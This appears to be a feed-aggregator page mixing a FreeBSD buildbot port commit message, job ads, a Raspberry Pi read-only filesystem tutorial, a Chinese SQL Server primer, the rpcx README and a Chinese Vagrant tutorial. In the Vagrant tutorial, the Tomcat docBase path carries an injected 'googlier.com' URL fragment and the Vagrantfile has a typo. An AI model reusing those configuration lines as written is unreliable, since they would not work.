          devel/py-buildbot-worker - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-www - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          Coding Instructor - Python STEAM! - The Curiosity Lab - Newmarket, ON      Cache   Translate Page      
Do you enjoy working with kids? Are you familiar with JavaScript and Python? Are you looking to add to your portfolio/teaching experience? Then we are... $18 - $20 an hour
From Indeed - Thu, 20 Sep 2018 12:28:28 GMT - View all Newmarket, ON jobs
          Urgent! Kids Coding Instructor, JavaScript, Python, Robotics Teacher - The Curiosity Lab - Aurora, ON      Cache   Translate Page      
As one of our instructors you will deliver our programs and workshops to kids. Do you enjoy working with kids?... $18 - $20 an hour
From Indeed - Wed, 26 Sep 2018 11:17:50 GMT - View all Aurora, ON jobs
          Business Intelligence Analyst (Business Objects experience is required) - Calance US - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Calance - Thu, 01 Nov 2018 18:20:38 GMT - View all Los Angeles, CA jobs
          Business Intelligence Analyst - Latham & Watkins LLP - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Latham & Watkins LLP - Sat, 18 Aug 2018 05:12:35 GMT - View all Los Angeles, CA jobs
          Senior Python Developer / Team Lead - Chisel - Toronto, ON      Cache   Translate Page      
Chisel.ai is a fast-growing, dynamic startup transforming the insurance industry using Artificial Intelligence. Our novel algorithms employ techniques from...
From Chisel - Mon, 22 Oct 2018 13:32:48 GMT - View all Toronto, ON jobs
          Senior Software Engineer - Python - Tucows - Toronto, ON      Cache   Translate Page      
Flask, Tornado, Django. Tucows provides domain names, Internet services such as email hosting and other value-added services to customers around the world....
From Tucows - Sat, 11 Aug 2018 05:36:13 GMT - View all Toronto, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener-Waterloo, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client overview:....
From Indeed - Wed, 10 Oct 2018 18:08:25 GMT - View all Kitchener-Waterloo, ON jobs
          Senior Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client Overview:....
From Integrity Resources - Wed, 10 Oct 2018 23:19:39 GMT - View all Kitchener, ON jobs
          Python Software Engineer - PageFreezer - British Columbia      Cache   Translate Page      
Experience using web framework such as Tornado with Python. Python Software Engineer....
From PageFreezer - Mon, 05 Nov 2018 06:09:49 GMT - View all British Columbia jobs
          Python Developer      Cache   Translate Page      
TX-Austin, Our well established client is seeking an ambitious and experienced Python Developer to join their dedicated team in Austin. This position has a great benefit package that includes Medical, Dental and Vision benefits, 401k with company matching, and life insurance for those who qualify. Responsibilities of the Python Developer: Review SOW use cases, specifications, and requirements to develop a cl
          Software Development Engineer, Big Data - Zillow Group - Seattle, WA      Cache   Translate Page      
Experience with Hive, Spark, Presto, Airflow and or Python a plus. About the team....
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to uncover real estate trends...
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist (Agent Pricing) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third-party data (think Hive, Presto, SQL Server, Python, Mode Analytics, Tableau, R) to make strategic recommendations....
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Visualization Engineer (Zillow Offers) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Python, R, Tableau) to develop solutions that will help move the business...
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Scientist - Vertical Living - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to make strategic...
From Zillow Group - Thu, 01 Nov 2018 11:21:13 GMT - View all Seattle, WA jobs
          PYTHON APPLICATIONS DEVELOPER - Givex - Toronto, ON      Cache   Translate Page      
We are seeking technically oriented application developers who are passionate about coding and relentless in the pursuit of excellence. Daily responsibilities...
From Givex - Fri, 03 Aug 2018 07:39:22 GMT - View all Toronto, ON jobs
          Headless RPi - prevent SD corruption      Cache   Translate Page      

Raspberry Pis are perfect when building interactive art projects (e.g. 20 printers printing ML generated tweets and often it’s nice to leave the Pi headless, i.e. without keyboard or monitor. And it’s convenient to just power up the device to start it and pull the power when its time to shut it down. However there are two minor issues - how do you get your code to start without a login and how do you precent system corruption. Thanksfully there are solutions to that.

Startup: Starting your code on startup.

There a many solutions for this but personally I like to run my code as a service. To do so add a file like the one below to /etc/rc.d/ and make it executable. This assumes your startup script lives in /home/you/mycode/run.sh and exepects to be run from that directory.

#! /bin/sh

### BEGIN INIT INFO
# Provides:             tweet_printer
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description:    Tweet stream deamon
### END INIT INFO

. /lib/lsb/init-functions

start() {
  log_action_begin_msg "Starting tweet printer daemon"
	cd /home/you/mycode/
	sh run.sh # OR python3 run.oy OR ./myexe 
  log_action_end_msg
}

stop() {
  log_action_begin_msg "Stopping tweet printer daemon"
  # <Insert command to kill your process here>
  #
  log_action_end_msg
}

case "$1" in
    start)
      start
  ;;
    stop)
      stop
  ;;
    restart)
      stop
      start
  ;;
    *)
      echo "Usage: <MYSERVICENAME> {start|stop|restart}"
      exit 1
  ;;
esac
exit 0

Note your code will run as root. Note this can also be a python program directly but i prefer the shell script to keep things more seperated.

Shutdown: Preventing SD corruption

Linux systems do not like to to be powered off suddenly and this can lead to corruption of the filesystem on the SD card. Last time we faced this issue we researched a bunch of UPS-like soutions that would detect power failure and provide both bridge-over power and a signal to the Pi to cleanly shut down using extra electronics and super caps or batteries. However, there’s a much much simpler solution: just mount the filesystem read only. This is not 100% straightforward and can have some drawbacks but for what we were doing it was perfect. Doing so makes the entire system completely stateless and thus unable to corrupt itself. THe drawback is you cannot persist any state from one boot to the next but there are aalso workarounds which we’ll discuss at the end. I’m basically following the instructions from http://ideaheap.com/2013/07/stopping-sd-card-corruption-on-a-raspberry-pi/ here, except that I go one more step and fully mount the system read-only. The lock/unlock scripts work around the usability issue.

0) Disable swapping

This will disable swapping:

sudo dphys-swapfile swapoff
sudo dphys-swapfile uninstall
sudo update-rc.d dphys-swapfile remove

Check that free -m shows the swap to be 0

1) Set up /etc/fstab to mount /var/log and /var/tmp using tmpfs. The system needs scratch space to write into, so just mounting the root filesystem read-only doesnt work very well. However we can setup in-RAM filesystem for this purpose. Add these two lines to /etc/fstab

none                  /var/log        tmpfs   size=1M,noatime   0       0
none                  /var/tmp        tmpfs   size=1M,noatime   0       0

Then also add ro to the line that mounts your root and boot file system. In the end the file should now look someting like this:

proc                  /proc           proc    defaults          0       0
PARTUUID=d6a29f93-01  /boot           vfat    ro,noatime        0       2
PARTUUID=d6a29f93-02  /               ext4    ro,noatime        0       1
none                  /var/log        tmpfs   size=1M,noatime   0       0
none                  /var/tmp        tmpfs   size=1M,noatime   0       0

Now the system will be stateless. However sometime its necesseray to unlock it to make mods:

2) Set up two script that will allow us to temporarily lock and unlock the filesystem if we need to edit something.

~/lock.sh

#!/bin/sh
mount -o remount,ro $(mount | grep " on / " | awk '{print $1}')

~/unlock.sh

#!/bin/sh
mount -o remount,rw $(mount | grep " on / " | awk '{print $1}')

If you’re updating kernels etc oyu may also have to remount /boot but that’s not as frequently necessary so I dont set up a script for that.

4) Hit sudo reboot check your service starts up

Drawbacks of this method

In my experience this works really well in practice, but there could be drawbacks:

  • You have no persistent system log - if something went wrong it can make debugging hard.
  • You can’t persist state from one boot to the next. One work around is to have a second SD card using a USB stick which is mounted periodically just when needed and then unmounted. Or you can briefly remount / read-write, write your state and then remount again. Not perfect (if the power goes of right that second) but it makes it way less likely. Or, if you hae network, you could send the state to a farawy server.
  • The tmp dirs that are in memory fill up you have an issue.
  • Not having a swap partition, if you run out of memory, you’ll likely crash.

          SQL Server数据库入门基础知识      Cache   Translate Page      
SQL Server数据库相关知识点

1、为什么要使用数据库?

数据库技术是计算机科学的核心技术之一。使用数据库可以高效且条理分明地存储数据、使人们能够更加迅速、方便地管理数据。数据库具有以下特点:

可以结构化存储大量的数据信息,方便用户进行有效的检索和访问

可以有效地保持数据信息的一致性.完整性,降低数据冗余

可以满足应用的共享和安全方面的要求

2、数据库的基本概念

⑴什么是数据?

数据就是描述事物的符号记录,数据包括数字、文字、图形、声音、图像等;数据在数据库中以“记录”的形式存储,相同格式和类型的数据将存放在一起;数据库中,每一行数据就是一条“记录”。

⑵什么是数据库和数据库表?

不同的记录组织在一起就是数据库的“表”,也就数说表就是来存放数据的,而数据库就是“表”的集合。

⑶什么是数据库管理系统?

数据库管理系统(DBMS)是实现对数据库资源有效组织、管理和存取的系统软件。它在操作系统的支持下,支持用户对数据库的各种操作。DBMS主要有以下功能:

数据库的建立和维护功能:包括建立数据库的结构和数据的录入与转换、数据库的转储与恢复、数据库的重组与性能监视等功能

数据定义功能:包括定义全局数据结构、局部逻辑数据结构、存储结构、保密模式及数据格式等功能。保证存储在数据库中的数据正确、有效和相容,以防止不合语义的错误数据被输入或输出,

数据操纵功能:包括数据查询统计和数据更新两个方面

数据库的运行管理功能:这是数据库管理系统的核心部分,包括并发控制、存取控制、数据库内部维护等功能

通信功能:DBMS与其他软件之间的通信

⑷什么是数据库系统?

数据库系统是一人一机系统,一由硬件、操作系统、数据库、DBMS、应用软件和数据库用户组成。

⑸数据库管理员(DBA)

一般负责数据库的更新和备份、数据库系统的维护、用户管理工作、保证数据库系统的正常运行。

3、数据库的发展过程

初级阶段-第一代数据库:在这个阶段IBM公司研制的层次模型的数据库管理系统-IMS问世

中级阶段-关系数据库的出现:DB2的问世、SQL语言的产生

高级阶段-高级数据库:各种新型数据库的产生;如工程数据库、多媒体数据库、图形数据库、智能数据库等

4、数据库的三种模型

网状模型:数据关系多对多、多对一,较复杂

层次模型:类似与公司上下级关系

关系模型:实体(实现世界的事物、如×××、银行账户)-关系

5、当今主流数据库

SQLServer:Microsoft公司的数据库产品,运行于windows系统上。

Oracle:甲骨文公司的产品;大型数据库的代表,支持linux、unix系统。

DB2:IBM公司的德加考特提出关系模型理论,13年后IBM的DB2问世

mysql:现被Oracle公司收购。运行于linux上,Apache和Nginx作为Web服务器,MySQL作为后台数据库,php/Perl/python作为脚本解释器组成“LAMP”组合

6、关系型数据库

⑴基本结构

关系数据库使用的存储结构是多个二维表格,即反映事物及其联系的数据描述是以平面表格形式体现的。在每个二维表中,每一行称为一条记录,用来描述一个对象的信息:每一列称为一个字段,用来描述对象的一个属性。数据表与数据库之间存在相应的关联,这些关联用来查询相关的数据。关系数据库是由数据表之间的关联组成的。其中:

数据表通常是一个由行和列组成的二维表,每一个数据表分别说明数据库中某一特定的方面或部分的对象及其属性

数据表中的行通常叫做记录或者元组,它代表众多具有相同属性的对象中的一个

数据表中的列通常叫做字段或者属性,它代表相应数据库中存储对象的共有的属性

⑵主键和外键

主键:是唯一标识表中的行数据,一个主键对应一行数据;主键可以有一个或多个字段组成;主键的值具有唯一性、不允许为控制(null);每个表只允许存在一个主键。

外键:外键是用于建立和加强两个表数据之间的链接的一列或多列;一个关系数据库通常包含多个表,外键可以使这些表关联起来。

⑶数据完整性规则

实体完整性规则:要求关系中的元组在主键的属性上不能有null

域完整性规则:指定一个数据集对某一个列是否有效或确定是否允许null

引用完整性规则:如果两个表关联,引用完整性规则要求不允许引用不存在的元组

用户自定义完整性规则

7、SQLServer系统数据库

master数据库:记录系统级别的信息,包括所有的用户信息、系统配置、数据库文件存放位置、其他数据库的信息。如果该数据库损坏整个数据库都将瘫痪无法使用。

model数据库:数据库模板

msdb数据库:用于SQLServer代理计划警报和作业

tempdb数据库:临时文件存放地点

SQL Server数据库文件类型

数据库在磁盘上是以文件为单位存储的,由数据文件和事务日志文件组成,一个数据库至少应该包含一个数据文件和一个事务日志文件。

数据库创建在物理介质(如硬盘)的NTFS分区或者FAT分区的一个或多个文件上,它预先分配了将要被数据和事务日志所使用的物理存储空间。存储数据的文件叫做数据文件,数据文件包含数据和对象,如表和索引。存储事务日志的文件叫做事务日志文件(又称日志文件)。在创建一个新的数据库的时候仅仅是创建了一个“空壳,必须在这个“空壳”中创建对象(如表等),然后才能使用这个数据库。

SQLServer2008数据库具有以下四种类型的文件

主数据文件:主数据文件包含数据库的启动信息,指向数据库中的其他文件,每个数据库都有一个主数据文件,主数据文件的文件扩展名是.mdf。

次要(辅助)数据文件:除主数据文件以外的所有其他数据文件都是次要数据文件,某些数据库可能不包含任何次要数据文件,而有些数据库则包含多个次要数据文件,次要数据文件的文件扩展名是.ndf。

事务日志文件:包含恢复数据库所有事务日志的信息。每个数据库必须至少有一个事务日志文件,当然也可以有多个,事务日志文件的推荐文件扩展名是.ldf。

文件流( Filestream):可以使得基于 SQLServer的应用程序能在文件系统中存储非结构化的数据,如文档、图片、音频等,文件流主要将SQLServer数据库引擎和新技术文件系统(NTFS)集成在一起,它主要以varbinary (max)数据类型存储数据。

Linux公社的RSS地址 : https://www.linuxidc.com/rssFeed.aspx

本文永久更新链接地址: https://www.linuxidc.com/Linux/2018-11/155182.htm


          Desenvolvedor Python Sênior – 1 Vaga – Rio de Janeiro – RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5bcf27ba7fa8cd3be411cfc5 emprego.net – onde candidatos e Leia mais...
          Desenvolvedor Python Júnior – 1 Vaga – Rio de Janeiro – RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5bcf24b80a4181469d2a287e emprego.net – onde candidatos e Leia mais...
          Desenvolvedor Python Sênior – 1 Vaga – Rio de Janeiro – RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5bcf11bc7fa8cd3be411ca85 emprego.net – onde candidatos e Leia mais...
          rpcx      Cache   Translate Page      
Faster multil-language bidirectional RPC framework in Go, like alibaba Dubbo and weibo Motan in Java, but with more features, Scale easily. 

License GoDoc travis Go Report Card coveralls QQ群 QQ企业群sourcegraph

Cross-Languages

you can use other programming languages besides Go to access rpcx services.
  • rpcx-gateway: You can write clients in any programming languages to call rpcx services via rpcx-gateway
  • http invoke: you can use the same http requests to access rpcx gateway
  • Java Client: You can use rpcx-java to access rpcx servies via raw protocol.
If you can write Go methods, you can also write rpc services. It is so easy to write rpc applications with rpcx.

Installation

install the basic features:
go get -u -v github.com/smallnest/rpcx/...
If you want to use reuseportquickcpzookeeperetcdconsul registry, use those tags to go get 、 go build or go run. For example, if you want to use all features, you can:
go get -u -v -tags "reuseport quic kcp zookeeper etcd consul ping rudp utp" github.com/smallnest/rpcx/...
tags:
  • quic: support quic transport
  • kcp: support kcp transport
  • zookeeper: support zookeeper register
  • etcd: support etcd register
  • consul: support consul register
  • ping: support network quality load balancing
  • reuseport: support reuseport

Features

rpcx is a RPC framework like Alibaba Dubbo and Weibo Motan.
rpcx 3.0 has been refactored for targets:
  1. Simple: easy to learn, easy to develop, easy to intergate and easy to deploy
  2. Performance: high perforamnce (>= grpc-go)
  3. Cross-platform: support raw slice of bytesJSONProtobuf and MessagePack. Theoretically it can be used with java, php, python, c/c++, node.js, c# and other platforms
  4. Service discovery and service governance: support zookeeper, etcd and consul.
It contains below features
  • Support raw Go functions. There's no need to define proto files.
  • Pluggable. Features can be extended such as service discovery, tracing.
  • Support TCP, HTTP, QUIC and KCP
  • Support multiple codecs such as JSON, ProtobufMessagePack and raw bytes.
  • Service discovery. Support peer2peer, configured peers, zookeeperetcdconsul and mDNS.
  • Fault tolerance:Failover, Failfast, Failtry.
  • Load banlancing:support Random, RoundRobin, Consistent hashing, Weighted, network quality and Geography.
  • Support Compression.
  • Support passing metadata.
  • Support Authorization.
  • Support heartbeat and one-way request.
  • Other features: metrics, log, timeout, alias, circuit breaker.
  • Support bidirectional communication.
  • Support access via HTTP so you can write clients in any programming languages.
  • Support API gateway.
  • Support backup request, forking and broadcast.
rpcx uses a binary protocol and platform-independent, which means you can develop services in other languages such as Java, python, nodejs, and you can use other prorgramming languages to invoke services developed in Go.
There is a UI manager: rpcx-ui.

Performance

Test results show rpcx has better performance than other rpc framework except standard rpc lib.
Test Environment
  • CPU: Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz, 32 cores
  • Memory: 32G
  • Go: 1.9.0
  • OS: CentOS 7 / 3.10.0-229.el7.x86_64
from https://github.com/smallnest/rpcx

          在Mac上,使用Vagrant打造本地开发环境      Cache   Translate Page      

1. vagrant介绍

1.1 vagrant能做什么

做Web开发(java/php/python/ruby…)少不了要在本地搭建好开发环境,虽然说目前各种脚本/语言都有对应的Windows版,甚至是一键安装包,但很多时候和Windows环境的兼容性(如配置文件、编译的模块)并不是那么好,麻烦的问题是实际部署的环境通常是Linux,常常还要面临着开发和部署环境不一致,上线前还要大量的调试。而如果让每个开发人员都自己去搭建本地环境,安装虚拟机、下载ISO镜像、选择规格安装创建vm、安装OS、配置,会耗费非常多的时间,如果是团队开发应该要尽量保持每个人的运行环境一致。此时vagrant正式你所需要的。不适用正式环境部署。
vagrant实际上一套虚拟机管理工具,基于Ruby开发,底层支持VirtualBox、VMware甚至AWS、docker等作为虚拟化系统。我们可以通过 Vagrant 封装一个 Linux 的开发环境,分发给团队成员。成员可以在自己喜欢的桌面系统(Mac/Windows/Linux)上开发程序,代码却能统一在封装好的环境里运行,“代码在我机子上运行没有问题”这种说辞将成为历史。
通过上面的介绍如果你还在困惑有virtualbox或vmware为什么还要加入vagrant,纠结于要不要使用,可以参考这个问答 使用vagrant的意义在哪,另外docker作为后起之秀也可以做vagrant能完成的事情,stackoverflow有关于两位作者讨论各自应用场景的精彩”互掐”,传送门→ (中文)。

1.2 几个概念

  • Provider:供应商,在这里指Vagrant调用的虚拟化工具。Vagrant本身并没有能力创建虚拟机,它是调用一些虚拟化工具来创建,如VirtualBox、VMWare、Xen、Docker,甚至AWS,这些虚拟化工具只要安装好了,vagrant会自动封装在底层通过统一的命令调用。也就是说使用vagrant时你电脑上还需要安装对应的Provider,默认是免费开源的virtualbox。
  • Box:可被Vagrant直接使用的虚拟机镜像文件,大小根据内容的不同从200M-2G不等。针对不同的Provider,Box文件的格式是不一样的,从 vagrantcloud.com 你可以找到社区维护的box。
  • Vagrantfile:Vagrant根据Vagrantfile中的配置来创建虚拟机,是Vagrant的核心。在Vagrantfile文件中你需要指明使用哪个Box(可以下载好的或自己制作,或指定在线的URL地址),虚拟机使用的内存大小和CPU,需要预安装哪些软件,虚拟机的网络配置,与host的共享目录等。
  • Provisioner:是Vagrant的插件的一种。大部分现成的box并不是你正好想要的,通过使用你熟悉的provisioner,比如Puppet,可以在你使用vagrant up启动虚拟机时自动的安装软件、修改配置等初始化操作。当然你也可以在最先启动虚拟机后,使用vagrant ssh进去然后手动安装软件,但毕竟不是所有人都是系统管理员,写好Vagrantfile后无需人工干预马上就可以使用vm。目前支持并实现的provisioning有Puppet、Salt、Ansible、Chef这些知名的自动化运维工具,当然需要一定的使用经验;也可以使用shell provisioner,故名思议这个插件就是通过执行shell命令完成统一的作用。
  • Guest Additions:这个是常在下载 base box 介绍里有的,一般用来实现host到vm的端口转发、目录共享,在开发环境上都建议装上以便测试。

2. 安装vagrant

选择适合你的平台(Windows、Mac、Linux),下载对应格式的安装包。如Mac下 vagrant_1.7.1.dmg、VirtualBox-4.3.20-96997-OSX.dmg 。

3. 使用vagrant打造一个本地开发环境

本文将会演示从 nrel CentOS6.5 开始,安装必要的开发包、python、插件、Puppet,然后打包成一个box分发给团队的全过程。你也可以在别人box的基础上进一步通过Vagrantfile定制自己的环境。

3.1 初始化

3.1.1 vagrant box add {box-name} {box-url}

1
2
3
4
5
6
7
8
9
10
11
$ vagrant box add ct65_00 Downloads/centos65.box 
==> box: Adding box 'ct65_00' (v0) for provider:
box: Downloading: file:///Users/sean/Downloads/centos65.box
==> box: Successfully added box 'ct65_00' (v0) for 'virtualbox'!

$ ll ~/.vagrant.d/boxes/ct65_00
$ vagrant box list

# vagrant box list
ct65_00 (virtualbox, 0)
centos64-i386 (virtualbox, 0)
这一条命令就是根据给出的box(镜像)文件地址,解压一份到用户目录~/.vagrant.d/boxes/{box-name}/0/virtualbox/下,所以你尽量应该以同一用户来管理进行vagrant所有操作。
F**K GFW
在GFW保护之下,这简单获取box文件反而一开始就难到我们了。官方提供的在线安装在墙外是极为方便的,vagrant box add minimal/centos6便自动从vagrantcloud.com(现更名为https://atlas.hashicorp.com/search/boxes)下载,直接进入第二步。
还有一种方法是,先vagrant init minimal/centos6,然后直接启动vagrant up --provider virtualbox。当然这些都与下载boxes到本地效果是一样的,下载方法就是在vagrantcloud.com上点开你所需要的box版本,然后再URL里加入/providers/virtualbox.box便得到文件地址,如 https://atlas.hashicorp.com/hashicorp/boxes/precise64 对应的文件为 https://atlas.hashicorp.com/hashicorp/boxes/precise64/providers/virtualbox.box 。
在墙内直接在线安装启动box,会报错:
1
2
3
4
5
6
7
8
The box 'ubuntu/trusty64' could not be found or
could not be accessed in the remote catalog. If this is a private
box on HashiCorp's Atlas, please verify you're logged in via
`vagrant login`. Also, please double-check the name. The expanded
URL and error message are shown below:

URL: ["https://atlas.hashicorp.com/ubuntu/trusty64"]
Error:
一个办法是ubuntu来 http://uec-images.ubuntu.com/vagrant/ 下载,centos来 http://nrel.github.io/vagrant-boxes/ 下载。我也从墙外下了几个典型的box放到了自己的百度云上共享了:http://pan.baidu.com/s/1sjHQBa1 。
2015-04-01更新:无意间发现现在不用梯子也可以访问了,Happy April Fool’s Day!

3.1.2 vagrant init {box-name}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ mkdir ~/vagrant && cd ~/vagrant  //这个目录的目的就是统一管理你的Vagrantfile
$ vagrant init ct65_00
A `Vagrantfile` has been placed in this directory. You are now
ready to `vagrant up` your first virtual environment! Please read
the comments in the Vagrantfile as well as documentation on
`vagrantup.com` for more information on using Vagrant.

$ vi Vagrantfile
...
Vagrant.configure(2) do |config|
config.vm.box = "ct65_00"
onfig.vm.network "forwarded_port", guest: 80, host: 8080
# config.vm.synced_folder "../data", "/vagrant_data"
config.vm.provider "virtualbox" do |vb|
vb.memory = "384"
vb.cpus = 1
end
config.vm.hostname = "vg-ct65_00.tp-link.net"
...
init只是在当前目录生成一个Vagrantfile文件和.vagrant/目录,可以对它进行修改,比如定义 vm guest machine 的hostname、memory、cpu等,具体有关语法介绍见后文。
用户后面up虚拟机,这个 box-name 与上面add的相同,如果是 base 则可以省略。

3.2 启动虚拟机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Importing base box 'ct65_00'...
==> default: Matching MAC address for NAT networking...
==> default: Setting the name of the VM: v-box_default_1427284884787_97348
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
default: Adapter 1: nat
==> default: Forwarding ports...
default: 22 => 2222 (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
default: SSH address: 127.0.0.1:2222
default: SSH username: vagrant
default: SSH auth method: private key
default: Warning: Connection timeout. Retrying...
default: Warning: Connection timeout. Retrying...
...
default: Warning: Remote connection disconnect. Retrying...
default: Warning: Remote connection disconnect. Retrying...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
==> default: Mounting shared folders...
default: /vagrant => /root/vagrant/v-box/ct65_00
up过程是默认会根据当前目录下的Vagrantfile来启动vm,如果当前目录没有Vagrantfile,则去上层目录寻找,依次类推。第一次vagrant up ct65_00时会从~/.vagrant.d/boxes中导入相应的box文件到~/VirtualBox VMs/,可以通过vboxmanage showvminfo {VM-ID}看到该虚拟机的配置(Mac上为VBoxManage)。如果你想让虚拟机存储在指定位置,如我的Mac SSD硬盘空间贵,可以运行VirtualBox,手动设置存储/storage的路径。
默认 localhost:2222 转发到 guest:22 以供ssh连接;用户名/密码:vagrant/vagrant;默认共享目录就是host上Vagrantfile所在目录;如果电脑配置比较低导致启动时间比较长,或者VirtualBox启动出错,可能会提示上面的 Connection timeout 。
另外提示一下,某次我在Linux上测试,由于Linux host本身也是vSphere虚拟机,通过vagrant启动virtualbox另一个虚拟机(即嵌套),一直Retrying,后来根据上面 stackoverflow 打开了VBox GUI,发现是CPU架构的问题,一直堵塞,所以就不建议虚拟机上再装虚拟机了:
1
VT-x/AMD-V hardware acceleration is not available on your system. Your 64-bit guest will fail to detect a 64-bit CPU and will not be able to boot.

3.2 连接虚拟机,初始化环境

vagrant ssh

1
2
3
$ vagrant ssh
Last login: Tue Mar 31 02:15:38 2015 from 10.0.2.2
Welcome to your Vagrant-built virtual machine.
一般建立box时约定的用户名/密码:vagrant/vagrant,root密码也是 vagrant,默认的网络连接方式是Host-Only。

定制你的环境

如安装jdk,创建用户,解压tomcat,修改server.xml,添加yum源等。这里一步到位,唯一要说明的是tomcat conf/server.xml 的
<Context path="" docBase="/vagrant_data#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" reloadable="true" >...应用目录设置为共享目录。

3.3 打包成box

3.3.1 安装必要软件

打包是为了分发出去,做扩展用
1
# yum install -y lrzsz telnet vim puppet puppetmaster
如果你是从0开始建立一个box,当然还需要创建vagrant用户以及public key,具体可以参考如何制作一个vagrant的base box

3.3.2 安装Virtualbox Guest Additions

每个人电脑上安装的Virtualbox版本很可能不一样,vagrant up可能会有提示版本不兼容(同一大版本号还好,可省略这一步),导致host到guest共享目录模块失败,最终无法启动虚拟机。
